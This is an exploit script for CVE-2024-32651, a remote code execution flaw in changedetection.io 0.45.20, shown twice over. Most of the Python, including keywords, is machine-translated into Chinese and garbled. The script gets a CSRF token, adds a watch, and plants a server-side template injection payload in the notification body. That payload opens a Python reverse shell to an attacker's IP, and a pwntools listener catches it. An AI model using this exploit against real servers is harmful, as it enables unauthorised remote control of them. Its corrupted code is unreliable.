#exploit title:更改eTection=0.45.20远程代码执行(RCE)
#日期: 5-26-2024
#利用作者: Zach Crossman(Zcrosman)
#供应商homepage: changeTection.io
#软件link: https://github.com/dgtlmoon/changedidetection.io
#版本:=0.45.20
#在: Linux上测试
#CVE : CVE-2024-32651
从PWN导入*
导入请求
来自BS4进口美丽的小组
导入argparse
def start_listener(端口):
侦听器=听力(端口)
打印(在端口{port} .'上f'LESTINGING in)
conn=侦听器.wait_for_connection()
打印(“接收到连接!”)
context.newline=b'\ r \ n'
#切换到交互式模式
conn.Interactive()
def add_detection(url,listing_ip,listing_port,notification_url=''):
session=requests.session()
#首先请求获得CSRF令牌
request1_headers={
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'Accept':'Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/webP,Image/apng,/; q=0.8,application/application/application/nigned-exchange; v=b3; q=0.7''',Q=0.7',
'接受编码:'gzip,deflate',
'Accept-Language':'En-US,en; q=0.9',
'Connection':'关闭'
}
响应=session.get(url,headers=request1_headers)
汤=beautifutsoup(响应。文本,'html.parser')
csrf_token=soup.find('input',{'name':'csrf_token'})['value']
打印(F'Obted CSRF TOKEN: {CSRF_TOKEN}')
#第二请求提交表格并获取重定向URL
add_url=f'{url}/form/add/quickwatch'
add_url_headers={#在这里定义add_url_headers
'Origin': URL,
'content-type':'应用程序/x-www-form-urlenCoded'
}
add_url_data={
'csrf_token': csrf_token,
'url':'https://reddit.com/r/baseball',
'tags':'',
'edit_and_watch_submit_button':'编辑手表',
'processor':'text_json_diff'
}
post_response=session.post(add_url,headers=add_url_headers,data=add_url_data,ally_redirects=false)
#从位置标题中提取URL
如果post_response.headers:中的“位置”
redirect_url=post_response.headers ['location']
打印(f'redirect url: {redirect_url}')
其他:
打印(“找不到重定向URL”)
返回
#第三请求将更改的删除URL与SSTI在Notification Config In In Notification配置
save_detection_url=f'{url} {redirect_url}'
save_detection_headers={#define save_detection_headers
'Referer': redirect_url,
'cookie': f'session={session.cookies.get('session')}'
}
save_detection_data={
'csrf_token': csrf_token,
'url':'https://reddit.com/r/all',
'title':'',
'tags':'',
'time_between_check-weeks':'',
'time_between_check-days':'',
'time_between_check-hours':'',
'time_between_check-minutes':'',
'time_between_check-seconds':'30',
'filter_failure_notification_send':'y',
'fetch_backend':'系统',
'webdriver_delay':'',
'webdriver_js_execute_code':'',
“方法” :'get',
“标题” :'',
“ :'',
'notification_urls': notification_url,
'notification_title':'',
'notification_body': f'''
{{{%for x in().类______________________________________________________________()%}}
{{{%'harning'in x .__ name __%}}}
{{{{{X()._ module .__ hindins __ ['__ import __']('os')。popen('python3 -c'import OS,Pty,socket; s=socket.Socket(); s.Connect(((\\'{lister_ip} \\',{listy_port})); [os.dup2(s.fileno(),f)f in(0,1,1,2)]
{{%endif%}}
{{%endfor%}}
''',
'notification_format':'系统默认
'include_filters':'',
'subtractive_selectors':'',
'filter_text_added':'y',
'filter_text_replaced':'y',
'filter_text_removed':'y',
'trigger_text':'',
'ignore_text':'',
'text_should_not_be_present':'',
'extract_text':'',
'save_button':'保存'
}
final_response=session.post(save_detection_url,headers=save_detection_headers,data=save_detection_data)
打印(“最终请求”。)
如果name=='__ -Main __':
Parser=argparse.argumentparser(description='添加检测并启动侦听器')
parser.add_argument(' - url',type=str,必需=true,help='目标站点的基本URL')
parser.add_argument(' - port',type=int,help='for the Listorer',默认=4444)
parser.add_argument(' - ip',type=str,必需=true,help=for Listorer'ip地址')
parser.add_argument(' - Notification',type=str,help='通知URL如果您不想使用系统默认值')
args=parser.parse_args()
add_detection(args.url,args.ip,args.port,args.notification)
start_listener(args.port)
#日期: 5-26-2024
#利用作者: Zach Crossman(Zcrosman)
#供应商homepage: changeTection.io
#软件link: https://github.com/dgtlmoon/changedidetection.io
#版本:=0.45.20
#在: Linux上测试
#CVE : CVE-2024-32651
从PWN导入*
导入请求
来自BS4进口美丽的小组
导入argparse
def start_listener(端口):
侦听器=听力(端口)
打印(在端口{port} .'上f'LESTINGING in)
conn=侦听器.wait_for_connection()
打印(“接收到连接!”)
context.newline=b'\ r \ n'
#切换到交互式模式
conn.Interactive()
def add_detection(url,listing_ip,listing_port,notification_url=''):
session=requests.session()
#首先请求获得CSRF令牌
request1_headers={
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'Accept':'Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/webP,Image/apng,/; q=0.8,application/application/application/nigned-exchange; v=b3; q=0.7''',Q=0.7',
'接受编码:'gzip,deflate',
'Accept-Language':'En-US,en; q=0.9',
'Connection':'关闭'
}
响应=session.get(url,headers=request1_headers)
汤=beautifutsoup(响应。文本,'html.parser')
csrf_token=soup.find('input',{'name':'csrf_token'})['value']
打印(F'Obted CSRF TOKEN: {CSRF_TOKEN}')
#第二请求提交表格并获取重定向URL
add_url=f'{url}/form/add/quickwatch'
add_url_headers={#在这里定义add_url_headers
'Origin': URL,
'content-type':'应用程序/x-www-form-urlenCoded'
}
add_url_data={
'csrf_token': csrf_token,
'url':'https://reddit.com/r/baseball',
'tags':'',
'edit_and_watch_submit_button':'编辑手表',
'processor':'text_json_diff'
}
post_response=session.post(add_url,headers=add_url_headers,data=add_url_data,ally_redirects=false)
#从位置标题中提取URL
如果post_response.headers:中的“位置”
redirect_url=post_response.headers ['location']
打印(f'redirect url: {redirect_url}')
其他:
打印(“找不到重定向URL”)
返回
#第三请求将更改的删除URL与SSTI在Notification Config In In Notification配置
save_detection_url=f'{url} {redirect_url}'
save_detection_headers={#define save_detection_headers
'Referer': redirect_url,
'cookie': f'session={session.cookies.get('session')}'
}
save_detection_data={
'csrf_token': csrf_token,
'url':'https://reddit.com/r/all',
'title':'',
'tags':'',
'time_between_check-weeks':'',
'time_between_check-days':'',
'time_between_check-hours':'',
'time_between_check-minutes':'',
'time_between_check-seconds':'30',
'filter_failure_notification_send':'y',
'fetch_backend':'系统',
'webdriver_delay':'',
'webdriver_js_execute_code':'',
“方法” :'get',
“标题” :'',
“ :'',
'notification_urls': notification_url,
'notification_title':'',
'notification_body': f'''
{{{%for x in().类______________________________________________________________()%}}
{{{%'harning'in x .__ name __%}}}
{{{{{X()._ module .__ hindins __ ['__ import __']('os')。popen('python3 -c'import OS,Pty,socket; s=socket.Socket(); s.Connect(((\\'{lister_ip} \\',{listy_port})); [os.dup2(s.fileno(),f)f in(0,1,1,2)]
{{%endif%}}
{{%endfor%}}
''',
'notification_format':'系统默认
'include_filters':'',
'subtractive_selectors':'',
'filter_text_added':'y',
'filter_text_replaced':'y',
'filter_text_removed':'y',
'trigger_text':'',
'ignore_text':'',
'text_should_not_be_present':'',
'extract_text':'',
'save_button':'保存'
}
final_response=session.post(save_detection_url,headers=save_detection_headers,data=save_detection_data)
打印(“最终请求”。)
如果name=='__ -Main __':
Parser=argparse.argumentparser(description='添加检测并启动侦听器')
parser.add_argument(' - url',type=str,必需=true,help='目标站点的基本URL')
parser.add_argument(' - port',type=int,help='for the Listorer',默认=4444)
parser.add_argument(' - ip',type=str,必需=true,help=for Listorer'ip地址')
parser.add_argument(' - Notification',type=str,help='通知URL如果您不想使用系统默认值')
args=parser.parse_args()
add_detection(args.url,args.ip,args.port,args.notification)
start_listener(args.port)
